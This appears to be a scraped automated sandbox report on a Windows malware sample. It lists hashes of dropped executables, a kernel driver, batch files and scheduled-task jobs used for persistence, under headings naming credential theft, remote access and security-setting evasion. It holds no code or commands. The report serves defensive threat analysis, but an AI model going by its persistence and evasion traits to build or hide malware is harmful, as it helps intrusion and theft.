Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

ID:	1651333
Product:	CloudBasic
Start time:	16:54:19
Start date:	28.03.2025
Sample:	SUAosT64HD.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	9a84a7b5cc944be439829ad200cd4bc0
SHA1:	4bef117ca6328405d457ace1a6f14a59e7d4758e
SHA256:	a9f93ec56cea5f5cc39a2462979aaedcc3c0ea49d2cdf211c6aff8bd3c668a79
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Or1ARiR[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	5107AA3FBCC40B1347D07558D56CB9E2	8C8E56156544B1E2841416E9D36DD2EE25D6FB8D	54D5CBAB5A7C8AB52997D52DD53E2F8AC7442BF6DB4F7AF2CC8541D3EC4F086C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	A3A4DDD18933E42BA3DF6883EB4EDAE5	EAF3E32EE293BC673743E0FE9C2AC273DCF4377B	75A226BDA81365B433B6A811A72F018D575B21BEE6B353A6AACB7AFAC29F457A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	9502D881BDF159613C10A234EB570722	F2D29EB30E8655135E416F7C734E8BDCB90F25E1	36AE4D38A565D2D9D1AAE3F72419FE6330FB2030017364B730393A0E4ED247D0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\apple[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	2512E61742010114D70EEC2999C77BB3	3275E94FEB3D3E8E48CF24907F858D6A63A1E485	1DC8BF01C0DF1FF9C85546E5304169E7F4B79712A63FBCB13CD577808D80B3FB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe	PE32+ executable (GUI) x86-64, for MS Windows	91E32ED673B7F332F036E2909F40A633	D1442262F1DF93440420FBA159E826F1DDEC5B13	A297911B8056D76502DF7DA401788C421E4AB5165F9F857E1DA0BF125A01C534
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	27F0DF9E1937B002DBD367826C7CFEAF	7D66F804665B531746D1A94314B8F78343E3EB4F	AFF35E23562FC36F4B8F6B5BF95EB5DBF11E8AF6674E3212AA0C4077DDFE8209
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\martin[1].zip	Zip archive data, at least v2.0 to extract, compression method=deflate	513B84F75EDFCBB46C69C030E16402D7	3D63E0EFDEA421861901056139463FB345000D21	CC42EF8603FD891E0F4C72FE84EC28790C6F6D1D47009F86C22D38EF5D8D7B6B
C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	PE32 executable (GUI) Intel 80386, for MS Windows	9502D881BDF159613C10A234EB570722	F2D29EB30E8655135E416F7C734E8BDCB90F25E1	36AE4D38A565D2D9D1AAE3F72419FE6330FB2030017364B730393A0E4ED247D0
C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	PE32 executable (GUI) Intel 80386, for MS Windows	2512E61742010114D70EEC2999C77BB3	3275E94FEB3D3E8E48CF24907F858D6A63A1E485	1DC8BF01C0DF1FF9C85546E5304169E7F4B79712A63FBCB13CD577808D80B3FB
C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe	PE32 executable (GUI) Intel 80386, for MS Windows	27F0DF9E1937B002DBD367826C7CFEAF	7D66F804665B531746D1A94314B8F78343E3EB4F	AFF35E23562FC36F4B8F6B5BF95EB5DBF11E8AF6674E3212AA0C4077DDFE8209
C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe	PE32 executable (GUI) Intel 80386, for MS Windows	A3A4DDD18933E42BA3DF6883EB4EDAE5	EAF3E32EE293BC673743E0FE9C2AC273DCF4377B	75A226BDA81365B433B6A811A72F018D575B21BEE6B353A6AACB7AFAC29F457A
C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe	PE32 executable (GUI) Intel 80386, for MS Windows	5107AA3FBCC40B1347D07558D56CB9E2	8C8E56156544B1E2841416E9D36DD2EE25D6FB8D	54D5CBAB5A7C8AB52997D52DD53E2F8AC7442BF6DB4F7AF2CC8541D3EC4F086C
C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe	PE32+ executable (GUI) x86-64, for MS Windows	91E32ED673B7F332F036E2909F40A633	D1442262F1DF93440420FBA159E826F1DDEC5B13	A297911B8056D76502DF7DA401788C421E4AB5165F9F857E1DA0BF125A01C534
C:\Users\user\AppData\Local\Temp\10359820261\martin.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	513B84F75EDFCBB46C69C030E16402D7	3D63E0EFDEA421861901056139463FB345000D21	CC42EF8603FD891E0F4C72FE84EC28790C6F6D1D47009F86C22D38EF5D8D7B6B
C:\Users\user\AppData\Local\Temp\22.exe	PE32 executable (GUI) Intel 80386, for MS Windows	89CCC29850F1881F860E9FD846865CAD	D781641BE093F1EA8E3A44DE0E8BCC60F3DA27D0	4D33206682D7FFC895CCF0688BD5C914E6B914EA19282D14844505057F6ED3E3
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	PE32 executable (GUI) Intel 80386, for MS Windows	9A84A7B5CC944BE439829AD200CD4BC0	4BEF117CA6328405D457ACE1A6F14A59E7D4758E	A9F93EC56CEA5F5CC39A2462979AAEDCC3C0EA49D2CDF211C6AFF8BD3C668A79
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat	ASCII text, with CRLF line terminators	E5DDB7A24424818E3B38821CC50EE6FD	97931D19F71B62B3C8A2B104886A9F1437E84C48	4734305286027757086EF56B9033319EC92C3756E3CA41D7BF22C631D392E1EA
C:\Users\user\AppData\Local\Temp\5CCD.tmp\5CCE.tmp\5CCF.bat	ASCII text, with CRLF line terminators	E5DDB7A24424818E3B38821CC50EE6FD	97931D19F71B62B3C8A2B104886A9F1437E84C48	4734305286027757086EF56B9033319EC92C3756E3CA41D7BF22C631D392E1EA
C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	PE32 executable (GUI) Intel 80386, for MS Windows	9502D881BDF159613C10A234EB570722	F2D29EB30E8655135E416F7C734E8BDCB90F25E1	36AE4D38A565D2D9D1AAE3F72419FE6330FB2030017364B730393A0E4ED247D0
C:\Users\user\AppData\Local\Temp\ssisd.sys	PE32+ executable (native) x86-64, for MS Windows	B69F744F56196978A2F9493F7DCB6765	3C9400E235DE764A605485A653C747883C00879B	38907D224AC0DF6DDB5EB115998CC0BE9FFDAE237F9B61C39DDAEDA812D5160D
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log	Unicode text, UTF-16, little-endian text, with CRLF line terminators	F3700B2E52B3FAC9B781BBED64EFB85E	ED6C080E7C80D295C018C6570A85EF020A453202	E03BDEE2C04B2BB826C953CE94DCD597B5E3B5554AB4DA66F37AA9D059ED3AA9
C:\Windows\Tasks\axplong.job	data	C98BF9ACB8FA1C9D4CE0C70D18F5803C	0EBCC9C318F7C942E37E59ABB1B9C21F59977360	0F4D8E11C186DEF2BB785A6370D80AA551AA339FBDC10EB46B8F7B83914B9575
C:\Windows\Tasks\rapes.job	data	3D22DF3DE185F2D2020E6BB771BD589D	9003EE6ED4D764DB6A0D5DEC6EA79765A69DCFC7	505DD42AEBF69C90880220BF061380C97DE0F78672451E74423C822EC09B3EEE
\Device\Null	ASCII text, with CRLF, CR line terminators	13015015DD907D28996153DF14881252	532C595BAAE0A027D02D1B28D7B83D57350A310E	4499283166530CE395CBC12677FEF2BD52759EACDCC5BDDE56C039B1A2E99C0B

Windows Analysis Report SUAosT64HD.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
SUAosT64HD.exe

Malware Threat Intel
Provided by